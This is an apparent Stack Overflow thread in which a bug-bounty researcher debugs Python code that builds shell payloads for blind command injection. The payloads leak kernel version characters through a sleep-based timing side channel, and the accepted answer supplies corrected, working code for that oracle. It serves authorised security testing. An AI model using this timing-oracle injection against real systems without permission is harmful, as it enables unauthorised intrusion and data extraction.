# How can I inject strings into shell scripts when generating them in Python?

Tags: python-3.x, bash

I have a script that I am using for a bug bounty program and am running blind code/command injection with.
I have already made the application sleep for 60 seconds based on user id boolean comparisons, so I know it's there.

What I am trying to do now is run shell commands, set them to a shell variable and blindly assess each one char by char, true or false.

The issue I am having is that the the variables I am setting are not being picked up by the host. I am testing this on my local machine at the moment, `Kali`.

When I print the output of the commands I can see `$char` for example rather than the shell variable `char`.

```
1: kernel_version=$(uname -r); 
2: char=$(echo $kernel_version | head -c 1 | tail -c 1); 
3: if [[ $char == M ]]; then sleep 60 ; exit; fi
```

How can I correct the below code so that variable are set and picked up correctly?

```
def bash_command(self, char, position):
        cmd1 = "kernel_version=$(uname -r); "
        cmd2 = f"char=$(echo $kernel_version | head -c {position} | tail -c 1); "

        op = '==' if char in self.letters + self.numbers else '-eq'

        cmd3 = f"if [[ $char {op} {char} ]]; then sleep 60 ; exit; fi"

        print("1: " + cmd1)
        print("2: " + cmd2)
        print("3: " + cmd3)

        return cmd1 + cmd2 + cmd3
```

Full Code:

https://raw.githubusercontent.com/richardcurteis/BugBountyPrograms/master/qc_container_escape.py

Comment: i can't understand what did you expect from this command `uname -r | head -c 39 | tail -c 1` , could you please show a sample of input and output

Comment: That said, _how_ you're running the code matters immensely. Provide a [mre]

Comment: @MahmoudOdeh, I've edited that line, it shouldn't have been '39'. What it does is look for teh first character in the output of `uname -r`

Comment: @CharlesDuffy edit inbound. I've linked to Github

Comment: Your bash_command is interpreted by Python.  So if you do `cmd = "uname -a"`, Pyhton will not run `$(uname -a)` and assign the result into variable cmd.  Python will assign the string "uname -a" to the cmd variable.

Comment: Does this answer your question? [Running Bash commands in Python](https://stackoverflow.com/questions/4256107/running-bash-commands-in-python)

Comment: That use of `os.popen()` is a critical detail needed to reproduce and not currently included in the question itself. A [mre], by definition, needs to *actually reproduce* a specific and well-defined problem when run without modifications.

Comment: BTW, `os.popen()` uses `sh`, not `bash`; they're different shells, and `[[` (among other features) isn't guaranteed to be supported.

Comment: I would also **strongly** suggest using [`shlex.quote()`](https://docs.python.org/3/library/shlex.html#shlex.quote) when generating content that will be parsed by a shell as code.

Comment: Even though I answered this, btw, I'm not sure it's a good knowledgebase entry as currently written. The title asks a question we have asked and answered many times over, whereas your _real_ question is much more obscure and includes a bunch of unstated corner cases.

Comment: If you _did_ have a guarantee that the relevant `sh` is `bash`, by the way, it would be far more efficient to use `${kernel_version:$position:1}` to extract a single character instead of the head/tail pipeline. See https://wiki.bash-hackers.org/syntax/pe for discussion of the syntax used.

Answer (score 0, accepted):

To sum up the question: You have a sandbox escape that lets you invoke a shell via `os.popen()` and determine the time taken by the call (but not the return value), and you want to extract `/proc/version` by guess-and-check.

The most immediate bug in your original code is that it depended on bash-only syntax, whereas `os.popen()` uses `/bin/sh`, which isn't guaranteed to support same.

The other thing that was... highly questionable as a practice (especially as a security researcher!) was the generation of code via string concatenation without any explicit escaping. C'mon -- we, as an industry, can do better than that. Even though `os.popen()` is a fairly limited channel if you can't set environment variables, one can use `shlex.quote()` to set values safely, and separate the program being executed from the process setup that precedes it.

```
shell_cmd = '''
position=$1
test_char=$2
kernel_version=$(uname -r)
found_char=$(printf '%s\n' "$kernel_version" | head -c "$position" | tail -c 1)
[ "$test_char" = "$found_char" ] && sleep 2
'''

import os, shlex, popen, time

def run_with_args(script, args):
    args_str = ' '.join([shlex.quote(str(arg)) for arg in args])
    set_args_cmd = 'set -- ' + args_str + ';'
    # without read(), we don't wait for execution to finish, and can't see timing
    os.popen(set_args_cmd + script).read()

def check_char(char, pos):
    start_time = time.time()
    run_with_args(shell_cmd, [pos+1, char]) # use zero-based offsets like sane people
    end_time = time.time()
    return end_time - start_time > 1
```

...whereafter, on a system with a 5.0 kernel, `check_char('5', 0)` will return True, but `check_char('4', 0)` will return False.

(Using timing as a channel assumes that there are countermeasures you're overcoming that prevent you from simply reading data from the FIFO that `os.popen()` returns; *of course*, if you can possibly do that instead, you should!)

Comment: Thanks for the answer and feedback, Charles. I hadn't known about `shlex.quote()`, I will utilise that in fture.